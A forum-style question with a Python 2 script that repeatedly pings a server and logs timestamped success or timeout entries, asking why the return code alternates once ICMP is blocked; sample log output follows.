buy the standard on-line. Who is your country's member body? Visit the ISO homepage and find out! The 2003 version of the standard (the 1998 version plus TC1) is available in print, ISBN 0-470-84674-7. 7.7. What's an ABI and why is it so messy? ABI stands for “Application Binary Interface”. Conventionally, it refers to a great mass of details about how arguments are arranged on the call stack and/or in registers, and how various types are arranged and padded in structs. A single CPU design may suffer multiple ABIs designed by different development tool vendors who made different choices, or even by the same vendor for different target applications or compiler versions. In ideal circumstances the CPU designer presents one ABI and all the OSes and compilers use it. In practice every ABI omits details that compiler implementers (consciously or accidentally) must choose for themselves. That ABI definition suffices for compilers to generate code so a program can interact safely with an OS and its lowest-level libraries. Users usually want an ABI to encompass more detail, allowing libraries built with different compilers (or different releases of the same compiler!) to be linked together. For C++, this includes many more details than for C, and most CPU designers (for good reasons elaborated below) have not stepped up to publish C++ ABIs. Such an ABI has been defined for the Itanium architecture (see C++ ABI for Itanium) and that is used by G++ and other compilers as the de facto standard ABI on many common architectures (including x86). G++ can also use the ARM architecture's EABI, for embedded systems relying only on a “free-standing implementation” that doesn't include (much of) the standard library, and the GNU EABI for hosted implementations on ARM. Those ABIs cover low-level details such as virtual function implementation, struct inheritance layout, name mangling, and exception handling. A useful C++ ABI must also incorporate many details of the standard library implementation. For a C ABI, the layouts of a few structs (such as FILE, stat, jmpbuf, and the like) and a few macros suffice. For C++, the details include the complete set of names of functions and types used, the offsets of class members and virtual functions, and the actual definitions of all inlines. C++ exposes many more library details to the caller than C does. It makes defining a complete ABI a much bigger undertaking, and requires not just documenting library implementation details, but carefully designing those details so that future bug fixes and optimizations don't force breaking the ABI. There are ways to help isolate library implementation details from the ABI, but they trade off against speed. Library details used in inner loops (e.g., getchar) must be exposed and frozen for all time, but many others may reasonably be kept hidden from user code, so they may later be changed. Deciding which, and implementing the decisions, must happen before you can reasonably document a candidate C++ ABI that encompasses the standard library. getchar 7.8. How do I make std::vector<T>::capacity() == std::vector<T>::size? The standard idiom for deallocating a vector<T>'s unused memory is to create a temporary copy of the vector and swap their contents, e.g. for vector<T> v vector<T> vector<T> v std::vector<T>(v).swap(v); The copy will take O(n) time and the swap is constant time. See Shrink-to-fit strings for a similar solution for strings.
http://gcc.gnu.org/onlinedocs/libstdc++/faq.html
CC-MAIN-2015-22
refinedweb
4,777
64.81
Should my web app be compatible with PHP 4? You know there are some big OO differences and database stuff. What's your idea? When PHP4 and IE6 can say goodbye!? I won't touch anything below 5.2. Generally I find complete rewrites, without the restriction of older versions, allows for easier addition of features and more possibilities. Though, to be fair, PHP 4 wasn't exactly incapable - it just meant having to approach things differently. The only reason to even think about php4 is if you have inherited a legacy app that won't run on 5. There is a massive difference between php and ie: with php you have control of the version, with ie the user does. Basically: support ie6 as long as it is financially beneficial to do so; support php4 as long as you are getting paid to do so. I mentioned ie here just for joking:). My question is just about PHP and the current servers support for php5. I...started developing for 5.3 and up exclusively. Symphony has gone the same route with version 2 of there framework. For me version portability is the crutch of legacy cruft that I want no part of. not me, I am still not using 5.3 as minimal requirement, but I do have 5.2 as my min required version Absolutely not, PHP4 is broken and will never be fixed. there are some plugins can fix it and library file also available Just: no. With WordPress I'd expect new features to be added that will only function with PHP 5. The PHP 4 compatibility would be progressively removed as it interferes with the new features rather than someone specifically going through and rewriting everything to get rid of it. I'd expect the same to be true of any other open source software. If it aint broke then why risk breaking it by trying to fix it? If a client already had PHP4 hosting and I was doing minimal programming, like a contact form then I'd support it, but for anything else, no. I'd like to start with PHP 5.3, mostly for namespaces, but for me that would be a bit limiting regarding hosting.Logic Earth - do you have 5.3 host recommendations? Thanks guys, NO is the right answer! A poll would have been more effective I'd say about 10% of PHP developers bother with PHP 4 at current times. I still see a fair few people around the forums mentioning that their system is PHP4 or that they haven't even personally made the jump from 4 to 5. Me however - I can't think of a realistic situation where PHP 4 is required. Servers can be upgraded and old software can be routed to PHP 4 if required. PHP 4 is long dead and has a growing number of security holes in it that will never be plugged. There is no reason for doing any further development for it since anyone who has been asleep for the last couple of years and therefore missed its death can be advised to upgrade to a current versipn of PHP. Properly written scripts for PHP 4 will still work on PHP 5 so it is only if they are still using scripts intended for PHP 3 that they would have problems with the upgrade. The question of whether to support old versions of software should only really arise in between the release of the replacement version and the death of the old version. So the question of whether to support PHP 4 was only really something that different people should have been making their own different decisions on would have been between the introduction of PHP 5 and the death of PHP 4 in 2008. There was plenty of time in between the introduction of PHP 4 and its death in 2008 to make any changes to code to upgrade from PHP 3 to change the things that PHP 3 supported and PHP 5 doesn't (which were all flagged as deprecated in PHP 4 so you'd know that they were being removed). I was checking db class of wordpress and discovered they somehow considered php4 compatibility /** * Connects to the database server and selects a database * * PHP4 compatibility layer for calling the PHP5 constructor. * * @uses wpdb::__construct() Passes parameters and returns result * @since 0.71 * * @param string $dbuser MySQL database user * @param string $dbpassword MySQL database password * @param string $dbname MySQL database name * @param string $dbhost MySQL database host */ function wpdb($dbuser, $dbpassword, $dbname, $dbhost) { return $this->__construct($dbuser, $dbpassword, $dbname, $dbhost); } /** * Connects to the database server and selects a database * * PHP5 style constructor for compatibility with PHP5. Does * the actual setting up of the class properties and connection * to the database. * * @since 2.0.8 * * @param string $dbuser MySQL database user * @param string $dbpassword MySQL database password * @param string $dbname MySQL database name * @param string $dbhost MySQL database host */ function __construct($dbuser, $dbpassword, $dbname, $dbhost) { register_shutdown_function(array(&$this, "__destruct")); if ( WP_DEBUG ) $this->show_errors(); ..... are they right? of course it's a personal decision That is most likely backwards compatibility. If you're starting a new project then it's irrelevant. At least for me, this is all dependent on the client if you do not have own server to deploy the site for your client. So if the client has server having PHP4 then one must be compelled to work for PHP even though we can suggest/recommend the client to go for PHP5 with lots of features. I have still one client who does not have the server upgraded to PHP5 because some websites are running with huge number files written in traditional PHP4 and I am also compelled to write codes for PHP4 which is also really panic for me in this era of OOP because I have PHP 5.3 in my local system for rest of the works and I always need to switch to PHP4 when I need to work for them. And regarding IE6, we cannot avoid yet because most of the users in the world have Windows XP which originally has IE6 in it. In otherwise case, I would really have deleted/removed IE6 from my dictionary No question about new projects. When WordPress was first created PHP 4 was the latest and greatest and so of course WordPress was designed to be able to run there. Why add to the workload by spending time deleting all the compatibility for PHP 4 when the time could be better spent adding new features? next page →
http://community.sitepoint.com/t/do-you-consider-php-4-while-developing-new-apps/51930
CC-MAIN-2015-06
refinedweb
1,104
69.11
#include <sys/mman.h> int mlock(const void *addr, size_t len); int munlock(const void *addr, size_t len); − multiple mlock() operations on the same address in the same process will all be removed with a single munlock(). Of course, a page locked in one process and mapped in another (or visible through a different mapping in the locking process) is still locked in memory. This fact can be used to create applications that do nothing other than lock important data in memory, thereby avoiding page I/O faults on references from other processes in the system. The contents of the locked pages will not be transferred to or from disk except when explicitly requested by one of the locking processes. This guarantee applies only to the mapped data, and not to any associated data structures (file descriptors and on-disk metadata, among others). If the mapping through which an mlock() has been performed is removed, an munlock() is implicitly performed. An munlock() is also performed implicitly when a page is deleted through file removal or truncation. Locks established with mlock() are not inherited by a child process after a fork() and are not nested. Attempts to mlock() more memory than a system-specific limit will fail. Upon successful completion, the mlock() and munlock() functions return 0. Otherwise, no changes are made to any locks in the address space of the process, the functions return −1 and set errno to indicate the error. The mlock() and munlock() functions will fail if: The addr argument is not a multiple of the page size as returned by sysconf(3C). Addresses in the range [addr, addr + len) are invalid for the address space of a process, or specify one or more pages which are not mapped. The system does not support this memory locking interface. The {PRIV_PROC_LOCK_MEMORY} privilege is not asserted in the effective set of the calling process. The mlock() function will fail if: Some or all of the memory identified by the range [addr, addr + len) could not be locked because of insufficient system resources or because of a limit or resource control on locked memory. Because of the impact on system resources, the use of mlock() and munlock() is restricted to users with the {PRIV_PROC_LOCK_MEMORY} privilege. See attributes(5) for descriptions of the following attributes: fork(2), memcntl(2), mmap(2), plock(3C), mlockall(3C), sysconf(3C), attributes(5), standards(5)
http://docs.oracle.com/cd/E36784_01/html/E36874/munlock-3c.html
CC-MAIN-2015-22
refinedweb
400
58.32
POSIX’ condition variables pthread_cond_t unfortunately have some drawbacks: - They require the use of at least two separate other objects that are only loosely coupled with the condition variable itself: - A plain variable, say Xof type int, that actually holds the value of which the condition depends. - A mutex that is just to regulate the access to Xand to the condition variable. - Generally they are not lock free. To access X we have to - lock the mutex - inspect X - eventually wait for the condition to become true - do changes - eventually signal other waiters about the changes we made - unlock the mutex Linux’ concept of futexes allows to associate an equivalent concept directly to the variable X and to access this variable without taking locks directly in most of the cases. More precisely, a futex solely works with the address and the value of variable X. Atomic access To access the value, we are supposed to use atomic operations. These are operations that are usually implemented in just one assembler instruction (but several clock cycles). They access the variable, change it and return the previous value with guaranteed atomicity: no other thread or process will come in the way and if the operation succeeds, all others will see the changed value. I will not go much into detail of these operations. They are not part of the current C99 standard but will be in the upcoming C1x. I will use the notations from there, but you may have a read into the gcc extension that already implements these kind of operations. I will only suppose that we are given two functions inline int atomic_fetch_add(int volatile *object, int operand); inline int atomic_fetch_sub(int volatile *object, int operand); Both return the value that had previously been stored in *object and add (respectively subtract) the operand. Making futexes available to user space As said above, Linux’ futexes work with the address and the value of an int variable X. Linux exports several system calls for that; we will look into two of them that will offer a “wait” and a “wake” procedure. If you will look into the man page for futex on a Linux machine you will usually find and entry (futex(2)) but unfortunately the library interface for that system call is missing so we have to build it first. The man page also states that you should stay away from this feature if you don’t know what you are doing. The goal of this text here is actually to make sure that at the end you will know what is necessary to use futexes well. For what we will be doing here, we will encapsulate the system call as follows # include <linux/futex.h> # include <sys/syscall.h> inline int orwl_futex(int *uaddr, /*!< the base address to be used */ int op, /*!< the operation that is to be performed */ int val /*!< the value that a wait operation expects when going into wait, or the number of tasks to wake up */ ) { return syscall(SYS_futex, uaddr, op, val, (void*)0, (int*)0, 0); } Wake up A simple wakeup function now looks like this inline int orwl_futex_wake(int* uaddr, int wakeup) { int ret = orwl_futex(uaddr, FUTEX_WAKE, wakeup); return ret; } The parameter uaddr is the address to which the futex is associated. Internally the kernel has a hash table with all (kernel space) addresses for which there are waiters. Calling orwl_futex_wake will now wake up wakeup threads that the kernel has registered as waiting for that address, respectively less if there are not as much waiting, or just nobody if nobody is waiting. As indicated, the kernel is using its internal memory address for the identification and not the virtual address that it receives through the system call. Thereby the futex mechanism works not only between different threads of the same process, but also between any processes that have mapped the same kernel page into their virtual memory. Two commonly tasks for wakeups are these: inline int orwl_futex_signal(int* uaddr) { return orwl_futex_wake(uaddr, 1); } inline int orwl_futex_broadcast(int* uaddr) { return orwl_futex_wake(uaddr, INT_MAX); } That’s it for the wake up part. Since waking up others cannot produce deadlocks this part is really simple. Waiting Waiting is a bit more complicated, because here we have to offer tools that can give us guarantees that we will not have deadlocks: inline int orwl_futex_wait_once(int* uaddr, int val) { int ret = 0; if (P99_UNLIKELY(orwl_futex(uaddr, FUTEX_WAIT, val) < 0)) { int errn = errno; if (P99_UNLIKELY(errn != EWOULDBLOCK && errn != EINTR)) { ret = errn; } errno = 0; } return ret; } As you can see the wrapper around orwl_futex is a bit more complex, because the idea that we have of the value (*uaddr) may be wrong. A scenario that could mess up our wait procedure: - We lookup (*uaddr)and find that it has value 5 - We conclude that 5for us is really a bad value and decide to take a nap. - Before we are able to call a “wait” function we are de-scheduled by scheduler because our time slice is over. - Another process or thread changes (*uaddr)to 6and wakes up all waiters. - We are scheduled again and make the “wait” call, just to never wake up again. orwl_futex_wait_once will return under three different circumstances: - A wake up event is triggered by some other task or process. This is in fact what we are waiting for. - The value (*uaddr)is initially not equal to val. Somebody has change the value in the mean time and the condition that made want to wait is no longer fulfilled. - An interrupt is received. The system wakes up the thread to handle a signal that it received. Once the interrupt handler returns it returns to its current context, that is to the end of the wait. So once we come back from such a call we can not be sure that the world as we know it has improved, we always have to check. Typically orwl_futex_wait_once is therefore wrapped into some loop that checks the condition that interests us and returns to the wait state if it is not yet satisfactory. Because we want to be able to handle general expressions for our condition, we wrap that loop in a macro and not an inline function: #define ORWL_FUTEX_WAIT(ADDR, NAME, EXPECTED) \ do { \ register int volatile*const p = (int volatile*)(ADDR); \ for (;;) { \ register int NAME = *p; \ if (EXPECTED) break; \ register int ret = orwl_futex_wait_once((int*)p, NAME); \ if (P99_UNLIKELY(ret)) { \ assert(!ret); \ } \ } \ } while (false) But as you hopefully see the inner loop is still relatively simple. It loads (*uaddr) into a local variable NAME, checks the condition EXPECTED and only goes into the wait function if it is not fulfilled. When coming back from the wait, the procedure is iterated in the hope that we now fulfill the condition. The rest of the macro is some sort of syntactic sugar that ensures that ADDR as passed to the macro is only evaluated once and also, that this macro can be placed anywhere a simple C statement would do. A counter example Let us illustrate all this with a simple example of a reference count. The goal is a data structure that has - atomic increment and decrement for those threads that refer to a resource and - a wait function for a maintenance thread that waits until all referrers have released the resource. An API could look like this typedef struct counter counter; struct counter { int volatile val; }; inline int counter_inc(counter* c); inline int counter_dec(counter* c); inline void counter_wait(counter* c); #define ACCOUNT(COUNT) P99_PROTECTED_BLOCK(counter_inc(&COUNT), counter_dec(&COUNT)) The first two functions are just simple wrappers around the atomic operators that are given above, you’ll easily figure that out yourself. We’d just have to come up with a sensible specification if we want to return the value of the counter before or after the operation. We don’t even have to use them directly in user code but through the macro ACCOUNT we may use them as counter myCount = { 0 }; ACCOUNT(myCount) { // do something } Here P99_PROTECTED_BLOCK will do all the wrapping to make sure that the “inc” and “dec” functions are called exactly once before entering and after leaving the inner block. Now last but not least, the implementation of the wait function is just wrapping around our macro: inline void counter_wait(counter* c) { ORWL_FUTEX_WAIT(&(c->val), X, !X); } Here the role of X is just to give a name to the internal variable such that we may refer to it inside the expression. The expression here is just !X to test if X is 0 or not. We could have placed any other expression such as (X <= 0) or (X % 42) of our liking, there. Anything that lets us interpret the value of the counter as a condition that we want to see to be fulfilled.
https://gustedt.wordpress.com/2011/01/28/linux-futexes-non-blocking-integer-valued-condition-variables/
CC-MAIN-2015-40
refinedweb
1,470
55.88
1. The "new UIWindow(UIScreen.MainScreen.Bounds) call must be in FinishedLaunching() and not in the AppDelegate's constructor. If it's done in the constructor, the app does not correctly process device rotations when it starts in landscape mode. NOTE: See expected vs. actual below 2. The Entitlements.plist file is missing, but is referred in the fsproj file: <CodesignEntitlements>Entitlements.plist</CodesignEntitlements> That causes build errors, as soon a project is compiled for the device. Simulator just works fine without it. *Version VS 3.9.302 *Expected namespace Test open System open UIKit open Foundation [<Register ("AppDelegate")>] type AppDelegate () = inherit UIApplicationDelegate () override val Window = module Main = [<EntryPoint>] let main args = UIApplication.Main (args, null, "AppDelegate") 0 *Actual namespace Test open System open UIKit open Foundation [<Register ("AppDelegate")>] type AppDelegate () = inherit UIApplicationDelegate () let window = new UIWindow (UIScreen.MainScreen.Bounds) // This method is invoked when the application is ready to run. override this.FinishedLaunching (app, options) = // If you have defined a root view controller, set it here: // window.RootViewController <- new MyViewController () window.MakeKeyAndVisible () true module Main = [<EntryPoint>] let main args = UIApplication.Main (args, null, "AppDelegate") 0 *Addendum The Expected vs. Actual are coming from the latest XS template(Expected) and the VS template(Actual) I have reproduced this issue at my end using the latest builds, and have observed that on creating the F# >> iOS Template application the code is appearing as it is mentioned above under the actual. Moreover, the Entitlements.plist file is missing because of which the application is giving build error when try to deploy on the device. Below is the screencast for the same: VS Logs: I can confirm using the latest Visual Studio 2017 Preview version 15.3 I am able to reproduce this issue. Marking this report as CONFIRMED. Microsoft Visual Studio Enterprise 2017 Preview (15.3) Version 15.3.0 Preview 4.0 VisualStudio.15.Preview/15.3.0-pre.4.0+26711.1 Microsoft .NET Framework Version 4.7.02046 Installed Version: Enterprise ASP.NET Web Frameworks and Tools 2017 5.2.50601.0 For additional information, visit Azure App Service Tools v3.0.0 15.0.30623.0 Azure App Service Tools v3.0.0 Azure Data Lake Node 1.0 This package contains the Data Lake integration nodes for Server Explorer. Azure Data Lake Tools for Visual Studio 2.2.9000.0 Microsoft Azure Data Lake Tools for Visual Studio Azure Data Lake Tools for Visual Studio 2.2.9000.0 Microsoft Azure Data Lake Tools for Visual Studio Common Azure Tools 1.10 Provides common services for use by Azure Mobile Services and Microsoft Azure Tools. Fabric.DiagnosticEvents 1.0 Fabric Diagnostic Events JavaScript Language Service 2.0 JavaScript Language Service Merq 1.1.17-rc (cba4571) Command Bus, Event Stream and Async Manager for Visual Studio extensions. Microsoft Azure HDInsight Azure Node 2.2.9000.0 HDInsight Node under Azure Node Microsoft Azure Hive Query Language Service 2.2.9000.0 Language service for Hive query Microsoft Azure Stream Analytics Language Service 2.2.9000.0 Language service for Azure Stream Analytics Microsoft Azure Stream Analytics Node 1.0 Azure Stream Analytics Node under Azure Node Microsoft Azure Tools 2.9 Microsoft Azure Tools for Microsoft Visual Studio 2017 - v2.9.50628.2 Mono Debugging for Visual Studio 4.6.8-pre (ec7034f) Support for debugging Mono processes with Visual Studio. NuGet Package Manager 4.3.3.4.0 TypeScript tools for Visual Studio Visual Studio Code Debug Adapter Host Package 1.0 Interop layer for hosting Visual Studio Code debug adapters in Visual Studio WebJobs Tools v1.0.0 __RESXID_PRODUCTVERSION__ WebJobs Tools v1.0.0. Hey Jon! I've moved this issue over to VSTS for further tracking: If you're interested in continuing to follow the status of this issue, please click the 'Follow' button on the bug in VSTS. In the future, please feel free to file bugs via aka.ms/xvs-bug, which feeds into our new bug tracker in VSTS. Thanks again for reporting this issue! <3 Pierce Boggan
https://bugzilla.xamarin.com/27/27373/bug.html
CC-MAIN-2021-39
refinedweb
677
52.46
. So, for example, many of the current features of unittest2 will be available in unittest in 2.7 and 3.2. This makes those features available to those that rely almost entirely on standard library functionality rather than third party packages. In the meantime, users of previous versions of Python can already use unittest2, and that package will work *without name conflicts* in both 2.7 and 3.2, even though many of its features have been added to the standard library. unittest2 may then even go through a few external releases before being synced up again with the standard library's unittest when 3.3 comes around. Something similar may turn out to be a good idea for distutils2: rather than consider the anticipated merge back into distutils prior to 3.3 the end of the road, instead continue to use distutils2 to release faster updates while evolving the API design towards 3.4. Users then have the choice - the solid, stable standard library version, or the distinctly named, more rapidly updated PyPI version. As others have suggested, this namespace separation approach could be standardised through the use of a PEP 382 namespace package so that users could choose between (e.g.) "unittest" and "distutils" and "cutting_edge.unittest" and "cutting_edge.distutils" (with the latter being the regularly updated, new features and all, PyPI versions, and the former the traditional stable API, bugfix-only standard library versions). That would probably be an improvement over the current ad hoc approach to naming separation for standard library updates. I don't see any way to ever resolve the two competing goal sets (stability vs latest features) without permanently maintaining separate namespaces. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia ---------------------------------------------------------------
https://mail.python.org/pipermail/python-ideas/2010-June/007402.html
CC-MAIN-2018-05
refinedweb
289
56.76
Hi, I'm fairly new to Unity, and I've been having trouble solving this problem. I've been trying to use the accelerometer for my game. The sphere is supposed to move left, right, up and down to navigate a 3D Maze. But for some reason, the sphere just moves left and right on its own or gets stuck. I followed Unity's own tutorial for using the accelerometer and it works, but when I attach a Rigid body to the sphere to have gravity act on it and have it fall on the ground (A plane), it seems to fall apart and either moves on its own or gets stuck. I've been using an iPad to test my code. Edit: Thanks that helped I've changed the code and it works now. The only problem with it now is that the controls seem to be opposite/backwards. Tilting right goes left etc. and also if I stop the game running it doesn't reset the input from the last test. When I try to run the game again it'll have an input already in that won't change. I'm having to disconnect the iPad and then plug it back in so the new input starts with 0. Any ideas? using UnityEngine; using System.Collections; public class PlayerController : MonoBehaviour { public float speed; public Vector3 input; void Update () { //Code for Accelerometer input = new Vector3 (Input.acceleration.x, 0, Input.acceleration.z); rigidbody.AddForce(input * speed * Time.deltaTime); } } Does anyone have any ideas on how to get this working, having a shape act as a character with accelerometer controls? I have looked around for different solutions but nothing has worked. Any help would me much appreciated on this, Thanks. transform.Translate should [almost] never be used on an object with a non-kinematic rigidbody attached. Use AddForce to drive rigidbody motion. Not sure that's your only issue, but it'll definitely cause weird. Player movement controls too slow 1 Answer Forward movement question 1 Answer How to make a RTS 1 Answer Unity UI Buttons don't work with Input.GetAxisRaw("Horizontal") 0 Answers Make object continue to move up as long as button is pressed 3 Answers
https://answers.unity.com/questions/895307/accelerometer-for-a-sphere-character.html
CC-MAIN-2019-35
refinedweb
371
73.78
Wipy 2.0 Cannot read internal flash without a SD card inserted I'm trying to read a file from the internal flash, but to do so I must have a sd card inserted even though I'm not using it. If I try without a card I get this: >>> from machine import SD >>> sd = SD() Traceback (most recent call last): File "<stdin>", line 1, in <module> OSError: the requested operation failed It works fine when a SD card is inserted. Is what I'm trying to do possible? Ah derp. yeah that works. I'm new to (micro)python & coding for hardware, so learning lots at the moment. Thanks. - Jurassic Pork last edited by Jurassic Pork hello, what is your code to read your file ? you don't need to use SD to play with the internal flash file system. Example to list files and read the content of the boot.py file in the internal flash file system : import os os.listdir() f = open('boot.py') f.read() f.close() Friendly, J.P
https://forum.pycom.io/topic/1226/wipy-2-0-cannot-read-internal-flash-without-a-sd-card-inserted
CC-MAIN-2020-45
refinedweb
175
82.04
As it seems, not everybody knows that this function returns a pointer that you can use to gain control of the created weapon. Syntax: Select all from commands.typed import TypedSayCommand from memory import make_object from messages import SayText2 from players.entity import Player from weapons.entity import Weapon @TypedSayCommand('!gimme') def cmd_on_gimme(command_info, weapon_name): player = Player(command_info.index) weapon = make_object(Weapon, player.give_named_item(weapon_name)) SayText2(f"Given {weapon.class_name} to {player.name}").send() Approach #2. Weapon.create When you create the entity by youself, obviously you have the reference to it, but the question is completely the opposite: how to give this weapon to a player. This is done by telling the player to touch a weapon. Doesn't even matter where the weapon was spawned. Syntax: Select all from commands.typed import TypedSayCommand from messages import SayText2 from players.entity import Player from weapons.entity import Weapon @TypedSayCommand('!gimme') def cmd_on_gimme(command_info, weapon_name): player = Player(command_info.index) weapon = Weapon.create(weapon_name) weapon.spawn() player.touch(weapon.pointer) SayText2(f"Given {weapon.class_name} to {player.name}").send() Now some information about CS:GO. As you may know, CS:GO introduced some weapons that share the classname (USP-S and HKP2000, for example, are both weapon_hkp2000). The difference between such weapons lies in their properties. For your convenience, Source.Python's Weapon.create converts aliases (say, weapon_usp_silencer) to the real classname and assigns correct properties to the created entity to make sure that the resulting weapon will be USP-S and not HKP2000. Well, at least it tries to do so. From my testing, Syntax: Select all Weapon.create('weapon_usp_silencer') still spawns HKP2000, but if you drop it and look at it, the hint will caption it as "USP-S". What about give_named_item then? It's a native Source function and it should do all the magic by itself. And it successfully recognizes the weapon_usp_silencer alias. The only problem is that this function is too good. Nobody asks for it, but the function will look up the player's inventory to see what weapon - USP or HKP2000 - the player has equipped. Then... it just ignores the alias and spawns the one it thinks "correct". I.e. it can spawn USP-S when you wanted it to spawn HKP2000 and vice versa. How to prevent it? The inventory lookup only succeeds if the player is on the correct team. Remember that USP/HKP2000 can only be bought by Counter-Terrorists? Then when the player is on the Terrorists team, give_named_item will spawn the weapon that we ask for. The following code: Syntax: Select all entity = Entity(player.index) old_team = entity.team entity.team = 2 # Terrorists player.give_named_item('weapon_hkp2000') entity.team = old_team basically saves player's current team, moves them to terrorists, gives the correct weapon and then restores their team. You might ask, why won't I use player.team? Because player.team is a shortcut to player.playerinfo.team, and changing the team using this shortcut will kill the player in process. entity.team, on the other side, is more raw and allows us to change player's team without any casualties.
https://forums.sourcepython.com/viewtopic.php?f=31&t=1597&sid=56eb81d814ff87b7d0159623aa2775e0
CC-MAIN-2018-22
refinedweb
522
61.83
import from dump (.dmp) file. I'm running Oracle database 11g Enterprise edition release 11.1.0.6.0. the import statement I'm using is and the error I'm getting is "incompatible versionnumber 3.1 in the dumpfile mydmpfile.dmp"and the error I'm getting is "incompatible versionnumber 3.1 in the dumpfile mydmpfile.dmp"Code:impdp system/password@orcl full=Y DIRECTORY=data_pump_dir dumpfile=mydmpfile.dmp logfile=min.log The dump file was exported using oracle 11.2.0.2.0. I tried to download/unzip the client version of instantclient 11.2.0.2 and add it to the PATH variable in windows and then re-run the script, but it didn't work. Anyone have a suggestion on how I should go from here to import this dump file without reinstalling the whole database? Thanks in advance!
http://forums.devshed.com/oracle-development-96/importing-dmp-file-incompatible-versionnumber-930039.html
CC-MAIN-2017-22
refinedweb
143
53.68
10 May 2012 05:31 [Source: ICIS news] SINGAPORE (ICIS)--?xml:namespace> HMEL is unable to start up the PP unit by end-April as planned because of an outage at its upstream 9m tonne/year refinery, the source said. The refinery, which is at the same site, was commissioned on 29 March. “The refinery has been restarted in early May after an unexpected brief shutdown. The PP unit will start up on 20 May, producing homopolymer grades for commercial sales,” he said. These include biaxially oriented PP (BOPP) film, cast film, extrusion, fibre and filaments, injection moulding, raffia, thermoforming and tubular quench (TQ) grades. Company officials could not be immediately reached for comment. HMEL is a joint venture between Hindustan Petroleum Corp Ltd (HPCL) and Mittal Energy Investment. Each company holds a 49% stake in HMEL, while the remaining 2% interest is held by financial
http://www.icis.com/Articles/2012/05/10/9558102/indias-hmel-delays-start-up-of-new-punjab-pp-unit-to-20.html
CC-MAIN-2014-49
refinedweb
146
55.54
It seems if the floating-point representation has radix 2 (i.e. FLT_RADIX == 2 std::ldexp(1, x) std::exp2(x) 2 x exp2(x) and ldexp(x,i) perform two different operations. The former computes 2x, where x is a floating-point number, while the latter computes x*2i, where i is an integer. For integer values of x, exp2(x) and ldexp(1,int(x)) would be equivalent, provided the conversion of x to integer doesn't overflow. The question about the relative efficiency of these two functions doesn't have a clear-cut answer. It will depend on the capabilities of the hardware platform and the details of the library implementation. While conceptually, ldexpf() looks like simple manipulation of the exponent part of a floating-point operand, it is actually a bit more complicated than that, once one considers overflow and gradual underflow via denormals. The latter case involves the rounding of the significand (mantissa) part of the floating-point number. As ldexp() is generally an infrequently used function, it is in my experience fairly common that less of an optimization effort is applied to it by math library writers than to other math functions. On some platforms, ldexp(), or a faster (custom) version of it, will be used as a building block in the software implementation of exp2(). The following code provides an exemplary implementation of this approach for float arguments: #include <cmath> /* Compute exponential base 2. Maximum ulp error = 0.86770 */ float my_exp2f (float a) { const float cvt = 12582912.0f; // 0x1.8p23 const float large = 1.70141184e38f; // 0x1.0p127 float f, r; int i; // exp2(a) = exp2(i + f); i = rint (a) r = (a + cvt) - cvt; f = a - r; i = (int)r; // approximate exp2(f) on interval [-0.5,+0.5] r = 1.53720379e-4f; // 0x1.426000p-13f r = fmaf (r, f, 1.33903872e-3f); // 0x1.5f055ep-10f r = fmaf (r, f, 9.61817801e-3f); // 0x1.3b2b20p-07f r = fmaf (r, f, 5.55036031e-2f); // 0x1.c6af7ep-05f r = fmaf (r, f, 2.40226522e-1f); // 0x1.ebfbe2p-03f r = fmaf (r, f, 6.93147182e-1f); // 0x1.62e430p-01f r = fmaf (r, f, 1.00000000e+0f); // 0x1.000000p+00f // exp2(a) = 2**i * exp2(f); r = ldexpf (r, i); if (!(fabsf (a) < 150.0f)) { r = a + a; // handle NaNs if (a < 0.0f) r = 0.0f; if (a > 0.0f) r = large * large; // + INF } return r; } Most real-life implementations of exp2() do not invoke ldexp(), but a custom version, for example when fast bit-wise transfer between integer and floating-point data is supported, here represented by internal functions __float_as_int() and __int_as_float() that re-interpret an IEEE-754 binary32 as an int32 and vice versa: /* For a in [0.5, 4), compute a * 2**i, -250 < i < 250 */ float fast_ldexpf (float a, int i) { int ia = (i << 23) + __float_as_int (a); // scale by 2**i a = __int_as_float (ia); if ((unsigned int)(i + 125) > 250) { // |i| > 125 i = (i ^ (125 << 23)) - i; // ((i < 0) ? -125 : 125) << 23 a = __int_as_float (ia - i); // scale by 2**(+/-125) a = a * __int_as_float ((127 << 23) + i); // scale by 2**(+/-(i%125)) } return a; } On other platforms, the hardware provides a single-precision version of exp2() as a fast hardware instruction. Internal to the processor these are typically implemented by a table lookup with linear or quadratic interpolation. On such hardware platforms, ldexp(float) may be implemented in terms of exp2(float), for example: float my_ldexpf (float x, int i) { float r, fi, fh, fq, t; fi = (float)i; /* NaN, Inf, zero require argument pass-through per ISO standard */ if (!(fabsf (x) <= 3.40282347e+38f) || (x == 0.0f) || (i == 0)) { r = x; } else if (abs (i) <= 126) { r = x * exp2f (fi); } else if (abs (i) <= 252) { fh = (float)(i / 2); r = x * exp2f (fh) * exp2f (fi - fh); } else { fq = (float)(i / 4); t = exp2f (fq); r = x * t * t * t * exp2f (fi - 3.0f * fq); } return r; } Lastly, there are platforms that basically provide both exp2() and ldexp() functionality in hardware, such as the x87 instructions F2XM1 and FSCALE on x86 processors.
https://codedump.io/share/3fE2RxLS2RPX/1/difference-between-ldexp1-x-and-exp2x
CC-MAIN-2017-17
refinedweb
679
63.29
All, I have this very basic script that's producing some odd output. What I need to do is constantly ping a server, and when/if that server stops responding, I want to write the timestamp and " timed out" to a file. We're trying to lock down a time as to when something is going down. The code is below, and what's happening is that while the server (in this case a host that I'm able to block icmp packets for on a router) is responding, the return code is 0 and it's fine, but once I put an acl on the router, the pings stop responding and now the script alternates between 0 and 1. Below is the code and I'll paste the result below it: import os, datetime, sys, string from subprocess import call, Popen import subprocess def Help(): print "Must supply a single IP address to ping and filename" print "\n" print "This application can be run from multiple" print "command windows" if len(sys.argv) < 3 or len(sys.argv) > 3: Help() address = sys.argv[1] filename = sys.argv[2] while True: ping = Popen( ['ping','-n','1',address.strip() ] , stdout=subprocess.PIPE, shell=True) pingResponse = ping.wait() print "Current response code is " + str(pingResponse) if pingResponse == 0: print pingResponse output = open(filename, 'a') output.write("["+datetime.datetime.now().strftime("%H:%M:%S.%f")+"]" + " Success\n") output.close() if pingResponse == 1: print pingResponse output = open(filename, 'a') output.write("["+datetime.datetime.now().strftime("%H:%M:%S.%f")+"]" + " Timed out\n") output.close() The result: 12:48:27.772000] Success [12:48:28.033000] Success [12:48:28.300000] Success [12:48:28.556000] Success [12:48:28.813000] Success [12:48:32.714000] Timed out [12:48:32.965000] Success [12:48:36.715000] Timed out [12:48:36.967000] Success [12:48:40.711000] Timed out [12:48:40.962000] Success [12:48:44.716000] Timed out 